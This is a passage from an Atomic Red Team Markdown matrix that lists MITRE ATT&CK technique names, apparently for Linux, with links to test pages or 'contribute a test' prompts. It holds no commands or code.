| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md) | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
|
||||
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | Bind Mounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
|
||||
| | | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) | |
|
||||
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
|
||||
| | | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Junk Code Insertion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
|
||||
| | | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
|
||||
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Extended Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | SVG Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Browser Extensions](../../T1176/T1176.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Compromise Software Supply Chain](../../T1195.002/T1195.002.md) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Data from Local System](../../T1005/T1005.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Backup Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
|
||||
| Wi-Fi Networks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
|
||||
| | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
|
||||
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [System Location Discovery](../../T1614/T1614.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
|
||||
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Overwrite Process Arguments [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md) | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
|
||||
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Bind Mounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
|
||||
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) | |
|
||||
| | | Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
